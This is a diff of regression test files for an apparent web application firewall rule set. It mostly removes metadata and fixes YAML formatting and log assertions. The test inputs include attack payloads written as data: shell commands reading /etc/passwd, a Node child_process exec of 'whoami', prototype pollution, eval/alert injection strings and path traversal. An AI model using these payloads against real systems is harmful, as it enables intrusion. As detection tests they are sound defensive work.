+5,7 @@ meta: rule_id: 920540 tests: - test_id: 1 - desc: "Unicode character bypass issue #2512: alert() alert" + desc: "Unicode character bypass issue #2512: alert() \u0061lert" stages: - input: dest_addr: "127.0.0.1" @@ -23,7 +23,7 @@ tests: log: expect_ids: [920540] - test_id: 2 - desc: "Unicode character bypass issue #2512: eval() eval()" + desc: "Unicode character bypass issue #2512: eval() \u0065val()" stages: - input: dest_addr: "127.0.0.1" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920620.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920620.yaml index f3cb87bce..8042efe29 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920620.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920620.yaml @@ -14,8 +14,9 @@ tests: dest_addr: "127.0.0.1" port: 80 encoded_request: "R0VUIC9nZXQgSFRUUC8xLjENCkhvc3Q6IGxvY2FsaG9zdA0KVXNlci1BZ2VudDogT1dBU1AgQ1JTIHRlc3QgYWdlbnQNCkFjY2VwdDogdGV4dC94bWwsYXBwbGljYXRpb24veG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCx0ZXh0L2h0bWw7cT0wLjksdGV4dC9wbGFpbjtxPTAuOCxpbWFnZS9wbmcsKi8qO3E9MC41DQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL2pzb24NCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veG1sDQoNCg==" + uri: "/post" + version: "HTTP/1.1" output: - # match reflected request in JSON response from httpbin - response_contains: |- - Content-Type\W*: \[\W*application/json, application/xml - no_expect_ids: [920620] + status: 200 + log: + no_expect_ids: [920620] diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921110.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921110.yaml index 26ee82fe0..ed8449861 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921110.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921110.yaml @@ -1,7 +1,6 @@ --- meta: author: "Christian S.J. Peron, Franziska Bühler, azurit" - description: None tests: - test_id: 1 desc: "HTTP Response Splitting" diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml index 24d5448c7..54f63b364 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, Franziska Bühler, azurit" - description: None tests: - test_id: 1 desc: HTTP response splitting (921130) from old modsec regressions diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921180.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921180.yaml index 7b322393a..881e2d4d1 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921180.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921180.yaml @@ -1,7 +1,6 @@ --- meta: author: "jptosso, azurit" - description: "Tests to trigger, or not trigger 921170 and 921180" rule_id: 921180 tests: - # Standard GET request @@ -84,8 +83,8 @@ tests: output: log: no_expect_ids: [921180] - - # HPP payload with multiple iterations - test_id: 6 + - test_id: 6 + desc: query parameter repetition stages: - input: dest_addr: "127.0.0.1" diff --git a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930110.yaml b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930110.yaml index b217eaa0b..65f94b99a 100644 --- a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930110.yaml +++ b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930110.yaml @@ -104,7 +104,9 @@ tests: log: no_expect_ids: [930110] - test_id: 7 - desc: "Path Traversal Attack (/../) query string" + desc: | + Path Traversal Attack (/../) query string. + Note: apparently, httpd strips dots, ModSecurity never sees them in `REQUEST_URI`` stages: - input: dest_addr: "localhost" @@ -211,7 +213,7 @@ tests: X-FTW: "This should trip" User-Agent: "OWASP CRS test agent" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?a=..;.\\.;\\." + uri: "/get?a=..;.\\.;\\." version: "HTTP/1.1" output: log: diff --git a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930120.yaml b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930120.yaml index 3a2b2268b..084806527 100644 --- a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930120.yaml +++ b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930120.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: None tests: - test_id: 1 desc: Remote File Access Attempt (930120) from old modsec regressions diff --git a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930130.yaml b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930130.yaml index 79f562df5..30983314c 100644 --- a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930130.yaml +++ b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930130.yaml @@ -1,7 +1,6 @@ --- meta: author: "Andrew Howe, azurit" - description: "None" rule_id: 930130 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931100.yaml b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931100.yaml index ca85a2736..fe62f3a92 100644 --- a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931100.yaml +++ b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931100.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: None tests: - test_id: 1 desc: Remote File Inclusion Attack (931100) from old modsec regressions diff --git a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931110.yaml b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931110.yaml index 37f4e627c..b03ef1598 100644 --- a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931110.yaml +++ b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931110.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: None tests: - test_id: 1 desc: Remote File Inclusion Attack (931110) from old modsec regressions diff --git a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931120.yaml b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931120.yaml index 0b95fd320..0ae323632 100644 --- a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931120.yaml +++ b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931120.yaml @@ -1,7 +1,6 @@ --- meta: author: "studersi, azurit" - description: None tests: - test_id: 1 desc: Remote File Inclusion Attack (931120) diff --git a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml index 19e752d02..d9f5c7581 100644 --- a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml +++ b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml @@ -1,7 +1,6 @@ --- meta: author: "studersi, azurit" - description: None tests: - test_id: 1 desc: Remote File Inclusion Attack (931130) diff --git a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml index b57d42210..5d1e1291c 100644 --- a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml +++ b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml @@ -1,7 +1,6 @@ --- meta: author: "emphazer, azurit" - description: None tests: - test_id: 1 desc: Remote File Inclusion Attack (931131) with REQUEST_FILENAME diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932120.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932120.yaml index 4e4f74a71..9050adb99 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932120.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932120.yaml @@ -1,7 +1,6 @@ --- meta: author: "Paul Beckett, azurit" - description: "Tests to trigger or not trigger rule 932120" rule_id: 932120 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932125.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932125.yaml index db6723858..a4fb0ce80 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932125.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932125.yaml @@ -1,7 +1,6 @@ --- meta: author: "0xInfection" - description: "Tests to trigger rule 932125" rule_id: 932125 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932130.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932130.yaml index 6c38dc749..ba37e6c0c 100755 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932130.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932130.yaml @@ -1,7 +1,6 @@ --- meta: author: "Paul Beckett, Max Leske, azurit" - description: "Tests to trigger or not trigger rule 932130" rule_id: 932130 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932131.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932131.yaml index e7e479eb2..3f673ed4a 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932131.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932131.yaml @@ -1,7 +1,6 @@ --- meta: author: "dune73, Max Leske, azurit" - description: "Tests to trigger or not trigger rule 932131" rule_id: 932131 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932160.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932160.yaml index fa787f6fa..c2a0a6344 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932160.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932160.yaml @@ -1,7 +1,6 @@ --- meta: author: "Paul Beckett, Esad Cetiner, azurit" - description: "Tests to trigger or not trigger rule 932160" rule_id: 932160 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml index f678da553..3f125fc35 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml @@ -210,7 +210,8 @@ tests: uri: "/get?host=www.google.com;/bin/ca?+/et*/passwd" version: HTTP/1.0 output: - no_log_contains: found within MATCHED_VAR + log: + match_regex: 'found within ARGS:host:' - test_id: 14 desc: "Test variable assignment ('cat /etc/passwd' assigned via individual variables, cat in reverse order)" stages: diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932236.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932236.yaml index 9e8e3fd92..8b2b6d423 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932236.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932236.yaml @@ -5,7 +5,8 @@ meta: Unix shell RCE - with / without prefix - command words of any length - - usual targets + `Referer` and `User-Agent`rule_id: 932236 + - usual targets + `Referer` and `User-Agent` +rule_id: 932236 tests: - test_id: 1 desc: "False negative report - POST arguments" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932239.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932239.yaml index 99fb9ae84..7a8729b70 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932239.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932239.yaml @@ -5,7 +5,8 @@ meta: Unix shell RCE - with / without prefix - command words of any length - - usual targets + `Referer` and `User-Agent`rule_id: 932239 + - usual targets + `Referer` and `User-Agent` +rule_id: 932239 tests: - test_id: 1 desc: "Unix RCE in request headers" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932260.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932260.yaml index 16c017ce0..d9e377534 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932260.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932260.yaml @@ -1,7 +1,6 @@ --- meta: author: "Paul Beckett, Franziska Bühler, karelorigin, Esad Cetiner, azurit" - description: "Tests to trigger or not trigger rule 932260" rule_id: 932260 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933100.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933100.yaml index 5c935e1e7..c6824245c 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933100.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933100.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, Franziska Bühler, azurit" - description: None tests: - test_id: 1 desc: PHP Injection Attack (933100) from old modsec regressions diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933110.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933110.yaml index c0aba7cb6..ed0a6b4b9 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933110.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933110.yaml @@ -1,7 +1,6 @@ --- meta: author: "lifeforms, azurit" - description: None tests: - test_id: 1 desc: PHP no file upload diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933111.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933111.yaml index cf55f158f..00adca968 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933111.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933111.yaml @@ -1,7 +1,6 @@ --- meta: author: "NiceYouKnow, azurit" - description: None tests: - test_id: 1 desc: "PHP Injection Attack: PHP Script File Upload Found" diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933120.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933120.yaml index 868003ce2..48d23b566 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933120.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933120.yaml @@ -1,7 +1,6 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None tests: - test_id: 1 desc: "PHP Injection Attack: Configuration Directive" @@ -37,7 +36,8 @@ tests: data: "var=session.referer_check%3dtrue" version: HTTP/1.0 output: - no_log_contains: = found within + log: + match_regex: 'session.referer_check found within ARGS:var:' - test_id: 3 desc: "PHP Injection Attack: Configuration Directive: engine" stages: diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933130.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933130.yaml index 29f0a94b7..653bbab73 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933130.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933130.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: Tests functionality of 933130 rule_id: 933130 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933131.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933131.yaml index 4254ed3db..55fbb3c87 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933131.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933131.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: Tests functionality of stricter sibling 933131 rule_id: 933131 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933140.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933140.yaml index 0041e05dc..9b73d9bb9 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933140.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933140.yaml @@ -1,7 +1,6 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None tests: - test_id: 1 desc: "PHP Injection Attack: I/O Stream" diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml index 5ab265a83..9f5fa44d8 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml @@ -1,7 +1,6 @@ --- meta: author: "lifeforms, azurit" - description: None tests: - test_id: 1 desc: phpinfo diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml index 1dd59171d..ad9c14489 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml @@ -1,7 +1,6 @@ --- meta: author: "lifeforms, ssigwart, azurit" - description: None tests: - test_id: 1 desc: "pmf + chain" diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml index 6ee4b956e..86ef8941b 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml @@ -1,7 +1,6 @@ --- meta: author: "lifeforms, Franziska Bühler, Max Leske, azurit" - description: None tests: - test_id: 1 desc: | @@ -260,7 +259,7 @@ tests: - test_id: 15 desc: | PHP function call with empry c-style comment syntax, whitespaces, and vertical tab. - payload: exec /**/ () + payload: exec \t/**/\t () stages: - input: dest_addr: 127.0.0.1 diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933161.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933161.yaml index cb9af4ed2..e277b6468 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933161.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933161.yaml @@ -1,7 +1,6 @@ --- meta: author: "lifeforms, azurit" - description: None tests: - test_id: 1 desc: regexp; must run test in PL3! diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml index e8dc30535..0464e98c4 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml @@ -1,7 +1,6 @@ --- meta: author: "lifeforms, azurit" - description: None tests: - test_id: 1 desc: PHP object injection diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml index b2f79f0ca..b93c8ba6e 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml @@ -1,7 +1,6 @@ --- meta: author: "lifeforms, azurit" - description: None tests: - test_id: 1 desc: PHP variable functions diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933190.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933190.yaml index 21a4dc9b3..0c2a9e839 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933190.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933190.yaml @@ -1,7 +1,6 @@ --- meta: author: "NiceYouKnow, azurit" - description: None tests: - test_id: 1 desc: "PHP Injection Attack: PHP Closing Tag Found" diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933200.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933200.yaml index e46e9c1c8..de7a6248d 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933200.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933200.yaml @@ -1,7 +1,6 @@ --- meta: author: "NiceYouKnow, azurit" - description: None tests: - test_id: 1 desc: "Positive test: PHP Injection Attack - Wrapper scheme detected (phar://)" diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934100.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934100.yaml index 17d72f457..4dfd1dc63 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934100.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934100.yaml @@ -1,7 +1,6 @@ --- meta: author: "lifeforms, airween, Max Leske, azurit" - description: "Tests for rule 934100" rule_id: 934100 tests: - test_id: 1 @@ -426,40 +425,6 @@ tests: output: log: expect_ids: [934100] - - test_id: 25 - desc: "5ZLKNU33" - stages: - - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - data: | - console.info(1) - uri: /post - output: - log: - expect_ids: [934100] - - test_id: 26 - desc: "5ZLKNU33" - stages: - - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - data: | - console.info(1) - uri: /post - output: - log: - expect_ids: [934100] - test_id: 27 desc: "Detect example function _$$ND_FUNC$$_ submitted as plaintext" stages: diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934101.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934101.yaml index 7d152b405..fbb8fbcfb 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934101.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934101.yaml @@ -1,7 +1,6 @@ --- meta: author: "rekter0, azurit" - description: "Tests for rule 934101" rule_id: 934101 tests: - test_id: 1 @@ -110,7 +109,7 @@ tests: Host: localhost User-Agent: "OWASP CRS test agent" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Cookie: test_cookie=require("child_process").exec('whoami') + Cookie: test_cookie=\u0072\u0065quire("child_process").exec('whoami') method: GET port: 80 uri: "/get" @@ -161,7 +160,7 @@ tests: Host: localhost User-Agent: "OWASP CRS test agent" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Cookie: test_cookie=cmVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLmV4ZWMoJ3dob2FtaScpCg== + Cookie: test_cookie=\u0063\u006dVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLmV4ZWMoJ3dob2FtaScpCg== method: GET port: 80 uri: "/get" diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934130.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934130.yaml index d4fa4810c..42ff4adc5 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934130.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934130.yaml @@ -1,7 +1,6 @@ --- meta: author: "lifeforms, azurit" - description: "Tests for rule 934130" rule_id: 934130 tests: - test_id: 1 @@ -209,7 +208,7 @@ tests: Host: localhost User-Agent: "OWASP CRS test agent" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Cookie: test_cookie=__proto__.foo=bar + Cookie: test_cookie=__\u0070\u0072oto__.foo=bar method: GET port: 80 uri: "/get" diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934140.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934140.yaml index f4fce6961..080d6ab13 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934140.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934140.yaml @@ -1,7 +1,6 @@ --- meta: author: "karelorigin, azurit" - description: "Tests for rule 934140" rule_id: 934140 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934150.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934150.yaml index 01a2b4598..60ed9998e 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934150.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934150.yaml @@ -1,7 +1,6 @@ --- meta: author: "karelorigin, azurit" - description: "Tests for rule 934150" rule_id: 934150 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934160.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934160.yaml index 437a05641..aed2d48cb 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934160.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934160.yaml @@ -1,7 +1,6 @@ --- meta: author: "karelorigin, azurit" - description: "Tests for rule 934160" rule_id: 934160 tests: - test_id: 1 @@ -479,7 +478,7 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 method: GET port: 80 - uri: "/get?eval=while(true);" + uri: "/get?eval=\u0077\u0068ile(true);" version: HTTP/1.1 output: log: @@ -527,7 +526,7 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 method: GET port: 80 - uri: "/get?eval=d2hpbGUodHJ1ZSk7Cg%3D%3D" + uri: "/get?eval=\u0064\u0032hpbGUodHJ1ZSk7Cg%3D%3D" version: HTTP/1.1 output: log: diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941100.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941100.yaml index edea0617d..b0e54a727 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941100.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941100.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, Walter Hop, azurit" - description: "Tests to trigger, or not trigger 941100" rule_id: 941100 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941101.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941101.yaml index 8d1bc6368..d80795be4 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941101.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941101.yaml @@ -1,7 +1,6 @@ --- meta: author: "4v3r9, Walter Hop, azurit" - description: "Test to trigger 941101" rule_id: 941101 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941110.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941110.yaml index d1b88c709..0fa0750f8 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941110.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941110.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: "Tests to trigger, or not trigger 941110" rule_id: 941110 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941120.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941120.yaml index 004cc9e13..1ca8f74c9 100644 --- 